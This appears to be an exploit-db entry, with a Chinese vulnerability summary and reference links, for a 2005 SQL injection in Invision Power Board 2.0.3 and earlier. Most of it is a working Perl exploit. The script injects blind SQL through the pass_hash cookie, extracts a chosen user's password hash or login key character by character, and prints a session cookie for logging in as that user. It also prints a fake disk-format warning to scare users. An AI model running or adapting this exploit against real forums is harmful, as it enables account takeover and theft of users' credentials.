https://www.exploit-db.com/exploits/1013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1037

InvisionPowerBoard(IPB)2.0.3及更早版本中存在SQL注入漏洞，远程攻击者可以通过一个修改内部$pid变量的特制的cookie密码哈希(pass_hash)来执行任意SQL命令。

#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Tony Little Lately" and "Petey Beege"
##################################################################

use LWP::UserAgent;

   $ua = new LWP::UserAgent;
   $ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1];   # userid to jack
my $iver = $ARGV[2];   # version 1 or 2
my $cpre = $ARGV[3];   # cookie prefix
my $dbug = $ARGV[4];   # debug?

if (!$ARGV[2])
{
        print "The type of the file system is NTFS.nn";
        print "WARNING, ALL DATA ON NON-REMOVABLE DISKn";
        print "DRIVE C: WILL BE LOST!n";
        print "Proceed with Format (Y/N)?n";
        exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ )
{
        for( $j=0; $j < 16; $j++ )
        {
                my $current = $charset[$j];
            my $sql = ( $iver < 2 ) ?  "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
                my $res = $ua->get($path, @cookie);

                # If we get a valid sql request then this
                # does not appear anywhere in the sources
                $pattern = '<title>(.*)Log In(.*)</title>';

                $_ = $res->content;

                if ($dbug) { print };

                if ( !(/$pattern/) )
                {
                        $outputs .= $current;
                        print "$currentn";
                    last;
                }

        }
  if ( length($outputs) < 1 )   { print "Not Exploitable!n"; exit;     }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;

# milw0rm.com [2005-05-26]

来源:MISC
链接:http://www.gulftech.org/?node=research&article;_id=00073-05052005
来源:forums.invisionpower.com
链接:http://forums.invisionpower.com/index.php?showtopic=168016
来源:BID
名称:13529
链接:http://www.securityfocus.com/bid/13529
来源:XF
名称:invision-powerboard-login-sql-injection(20446)
链接:http://xforce.iss.net/xforce/xfdb/20446
来源:MISC
链接:http://www.securiteam.com/exploits/5GP0E2KFQQ.html
来源:OSVDB
名称:16297
链接:http://www.osvdb.org/16297
来源:SECTRACK
名称:1014499
链接:http://securitytracker.com/id?1014499
来源:SECTRACK
名称:1013907
链接:http://securitytracker.com/id?1013907
来源:SECUNIA
名称:15265
链接:http://secunia.com/advisories/15265
来源:MILW0RM
名称:1013
链接:http://milw0rm.com/exploits/1013
来源:BUGTRAQ
名称:20050526InvisionPowerBoard1.*and2.*Exploit(BID13529)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111712587206834&w;=2
来源:BUGTRAQ
名称:20050506MultipleVulnerabilitiesInInvisionPowerBoard
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111539908705851&w;=2